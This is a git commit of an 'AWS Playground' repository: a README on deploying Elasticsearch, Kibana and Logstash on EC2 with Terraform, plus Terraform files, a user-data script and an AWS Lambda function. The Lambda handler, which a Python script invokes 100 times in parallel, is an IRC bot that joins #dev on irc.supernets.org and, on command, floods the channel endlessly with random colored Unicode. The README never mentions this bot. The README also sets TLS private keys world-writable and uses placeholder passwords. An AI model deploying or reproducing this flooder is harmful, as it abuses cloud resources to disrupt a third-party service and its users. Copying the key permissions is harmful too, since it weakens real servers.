Initial commit

This commit is contained in:
Dionysus 2023-09-22 15:08:47 -04:00
commit 3afe81666a
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE
9 changed files with 293 additions and 0 deletions

140
README.md Normal file
View File

@ -0,0 +1,140 @@
# AWS Playground
Exploration and documentation of my experiments deploying Elasticsearch and the various facets of the ELK stack *(Elasticsearch, Logstash, and Kibana)* using the sophisticated amalgamation of Terraform and Amazon Web Services *(AWS)*.
This narrative not only encapsulates the mechanistic aspects of automated deployments but also delves into the intricate challenges and nuances that such an integration presents.
While not primed for production, it offers invaluable insights, underscoring my dedication to mastering cutting-edge technologies and showcasing my intellectual rigor in navigating complex cloud-based infrastructures.
## Getting Started
1. Sign up an [AWS account](https://aws.amazon.com/)
2. Create an [IAM User](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html)
- Add the `AmazonEC2FullAccess` permission policy
3. Create an [EC2 Key Pair](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-key-pairs.html)
4. Create an [EC2 Security Group](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html)
- For IPv6, edit your VPC & add a IPv6 CDIR
5. Launch an [EC2 Instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EC2_GetStarted.html)
- Select `debian`, on a `t2.micro`, using your keypair & security group created earlier
## AWS CLI
```shell
sudo apt-get install -y awscli && aws configure
```
**Note:** If you get errors about `ImportError: cannot import name 'DEFAULT_CIPHERS' from 'urllib3.util.ssl_'`: `python -m pip install requests "urllib3<2`
## Terraform
```shell
sudo apt-get install -y gnupg software-properties-common
wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
gpg --no-default-keyring --keyring /usr/share/keyrings/hashicorp-archive-keyring.gpg --fingerprint
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt-get update && sudo apt-get install -y terraform
```
## Elasticsearch
```shell
sudo apt-get install -y gnupg apt-transport-https
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-8.x.list
sudo apt-get update && sudo apt-get install elasticsearch kibana logstash
sudo certbot certonly --standalone --preferred-challenges http -d elastic.domain.org
```
* Copy your certificates to `/etc/elasticsearch/certs`:
```shell
mkdir -p /etc/elasticsearch/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/elasticsearch/certs/fullchain.pem
sudo cp /etc/letsencrypt/live/elastic.domain.org/privkey.pem /etc/elasticsearch/certs/privkey.pem
sudo chmod -R 777 /etc/elasticsearch/certs/
```
* Edit your `/etc/elasticsearch/elasticsearch.yml` and change the follow options:
```yaml
cluster.name: BeeHive
node.name: gibson
network.host: 0.0.0.0
bootstrap.memory_lock: true
xpack.security.audit.enabled: true
xpack.security.http.ssl:
enabled: true
key: /etc/elasticsearch/ssl/privkey.pem
certificate: /etc/elasticsearch/ssl/fullchain.pem
```
* System changes:
```shell
sudo su
ulimit -n 65535
ulimit -u 4096
echo "elasticsearch - nofile 65535" > /etc/security/limits.conf
mkdir -p /etc/systemd/system/elasticsearch.service.d/
echo "[Service]\nLimitMEMLOCK=infinity" > /etc/systemd/system/elasticsearch.service.d/override.conf
sudo swapoff -a
sudo sysctl -w vm.swappiness=1 # Add these
sudo sysctl -w vm.max_map_count=262144 # to /etc/systctl.conf
sudo sysctl -w net.ipv4.tcp_retries2=5 #
```
* Set the password for Kibana:
`./usr/share/elasticsearch/bin/elasticsearch-reset-password -u kibana_system`
`./usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token --scope kibana # Save this for when we access Kibana the first time`
`./usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node # enrollment token for a new node`
## Setup Kibana
* Copy your certificates to `/etc/kibana/certs`:
```shell
mkdir -p /etc/kibana/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/kibana/certs/fullchain.pem
sudo cp /etc/letsencrypt/live/elastic.domain.org/privkey.pem /etc/kibana/certs/privkey.pem
```
* Edit your `/etc/kibana/kibana.yml` and change the follow options:
```yaml
server.host: "0.0.0.0"
server.publicBaseUrl: "https://elastic.domain.org"
server.ssl.enabled: true
server.ssl.certificate: /etc/kibana/certs/fullchain.pem
server.ssl.key: /etc/kibana/certs/privkey.pem
elasticsearch.hosts: ["https://elastic.domain.org:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "changeme" # Use the password from the reset command we did earlier
```
## Setup Logstash
* Copy your certificates to `/etc/logstash/certs`:
```shell
mkdir -p /etc/logstash/certs/
sudo cp /etc/letsencrypt/live/elastic.domain.org/fullchain.pem /etc/logstash/certs/cacert.pem
```
* Edit your `/etc/logstash/logstash.yml` and change the follow options:
```yaml
input {
beats {
port => 5044
}
}
output {
elasticsearch {
hosts => ["https://elastic.domain.org:9200"]
index => "%{[@metadata][beat]}-%{[@metadata][version]}-%{+YYYY.MM.dd}"
user => "elastic"
password => "changeme"
cacert => "/etc/logstash/cacert.pem"
}
}
```
* `logstash-plugin install logstash-input-irc`
## Start the ELK stack:
```shell
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service && sudo systemctl start elasticsearch.service
sudo systemctl enable kibana.service && sudo systemctl start kibana.service
sudo systemctl enable logstash.service && sudo systemctl start logstash.service
```

View File

@ -0,0 +1,28 @@
#!/usr/bin/env python3
import concurrent.futures
import json
try:
import boto3
except ImportError:
print('This script requires the Boto3 module.')
exit()
lambda_client = boto3.client('lambda')
def invoke_lambda(payload):
response = lambda_client.invoke(
FunctionName='FUNK-0',
InvocationType='RequestResponse',
Payload=bytes(json.dumps(payload).encode('utf-8'))
)
response_payload = json.loads(response['Payload'].read())
return response_payload
payloads = [{'key': f'value_{i}'} for i in range(100)]
with concurrent.futures.ThreadPoolExecutor() as executor:
results = list(executor.map(invoke_lambda, payloads))
for result in results:
print(result)

View File

@ -0,0 +1,24 @@
# This file is maintained automatically by "terraform init".
# Manual edits may be lost in future updates.
provider "registry.terraform.io/hashicorp/aws" {
version = "5.16.2"
hashes = [
"h1:bsPS1G10A6F2zOVh3lCuzF+vvxOzq8Ffm/uJvGB4C60=",
"zh:00697204583b32e880abe73eb37814f34c07c9b3294f5c85755ee02cbdfcaa92",
"zh:1345d8b2ab9ddcf25d313152f17fd139a1d570229542949dc819184bf851305e",
"zh:14a0d2de839d26b8607078de059be328a47d60cee95756fb1c1500b3c6b552a2",
"zh:15f7c1f561df4e596f69d983014850c6e29c7025921a1d45150e23162e9bbfa7",
"zh:3587de4370db87b0955e08bb521cc8b15ba3c616a4a22238b2934bc7d7e3dc3e",
"zh:4e98960e8e1ad18a079e83e7a86806a2dd7a28ac67a100471776e424f5d02140",
"zh:674eaa30c90410a0d0c2ef52f5ad47c74f186fe2e7e03475bfeca5bcda67a490",
"zh:683eb032f5dce2673d25c48c50e1fe88cbb0d255640babad496767f3db5993fd",
"zh:6f157679a955ff43c468169bcb412b555bbd6b9664a61a4e71019df307e80f1c",
"zh:720c6c3873b36e361477f0ed2920803e35773cb652d51c757b3581d0db08e6e5",
"zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425",
"zh:9e86cc849446901c77c05d6735271befb443b18fd84890b00aaef6a11ab54212",
"zh:a02ecab0f8d68a7f7ed6b2e37a53999d234606e5b8f65f2c3bcfb82826131f00",
"zh:a9d545217cd339ddfb0b9061a89e82022d727d654bddac294eb0d544a3367fbc",
"zh:b5a495582adb2c92cff67013c9083f7a08b9295e29af816c541177eb989a20ee",
]
}

28
terraform/aws/ec2.tf Normal file
View File

@ -0,0 +1,28 @@
provider "aws" {
region = var.aws_region
}
data "aws_ami" "debian_latest_AMI" {
most_recent = true
owners = ["136693071363"]
filter {
name = "name"
values = ["debian-12-amd64-*-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
}
resource "aws_instance" "instance" {
count = var.aws_instance_count
ami = data.aws_ami.debian_latest_AMI.id
instance_type = var.aws_instance_type
vpc_security_group_ids = [var.aws_security_group]
key_name = var.aws_key_pair_name
user_data = "${file(var.aws_user_data_file_path)}"
tags = {
Name = "node-${count.index}"
}
}

31
terraform/aws/lambda.tf Normal file
View File

@ -0,0 +1,31 @@
provider "aws" {
region = var.aws_region
}
resource "aws_iam_role" "lambda_execution_role" {
name = "LambdaExecutionRole"
assume_role_policy = jsonencode({
Version = "2012-10-17",
Statement = [
{
Action = "sts:AssumeRole",
Effect = "Allow",
Principal = {
Service = "lambda.amazonaws.com"
}
}
]
})
}
resource "aws_lambda_function" "this" {
count = var.instance_count
function_name = "FUNK-${count.index}"
handler = "lambda_function.lambda_handler"
role = aws_iam_role.lambda_execution_role.arn
runtime = "python3.8"
filename = "lambda_function.zip"
source_code_hash = filebase64sha256("lambda_function.zip")
timeout = 15
}

View File

@ -0,0 +1,32 @@
#!/usr/bin/env python
import random,socket,ssl,time
def lambda_handler(event, context):
def raw(msg) : sock.send(bytes(msg + '\r\n', 'utf-8'))
def rnd(size): return ''.join(random.choices('aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ0123456789', k=size))
sock = ssl.wrap_socket(socket.socket())
sock.connect(('irc.supernets.org', 6697))
raw(f'USER {rnd(5)} 0 * :' + rnd(5))
raw('NICK ' + rnd(5))
while True:
try:
data = sock.recv(1024).decode('utf-8')
for line in (line for line in data.split('\r\n') if len(line.split()) >= 2):
args = line.split()
if args[0] == 'PING' : raw('PONG ' + args[1][1:])
elif args[1] == '001':
time.sleep(3)
raw('JOIN #dev')
elif args[1] == 'PRIVMSG' and len(args) == 4:
msg = ' '.join(args[3:])[1:]
if msg == '.go':
curr = 4096
while True:
unistr = [chr(item) for item in range(curr,curr+50)]
sender = ''
for item in unistr:
sender = sender + '\x03'+str(random.randint(2,256)) + random.choice(['\x1f','\x02','\x16','']) + item + '\x0f'
raw('PRIVMSG #dev :' + sender)
curr = random.randint(4096,1114100)
time.sleep(0.05)
except (UnicodeDecodeError,UnicodeEncodeError):
pass

Binary file not shown.

3
terraform/aws/node.sh Normal file
View File

@ -0,0 +1,3 @@
#!/bin/sh
touch "itworks.txt"
# this will place a file in /

View File

@ -0,0 +1,7 @@
# AWS Variables
aws_region = "us-east-1"
aws_security_group = "sg-0335e29b8928dd542"
aws_instance_type = "t2.micro"
aws_key_pair_name = "awsvegas"
aws_user_data_file_path = "node.sh"
aws_instance_count = 5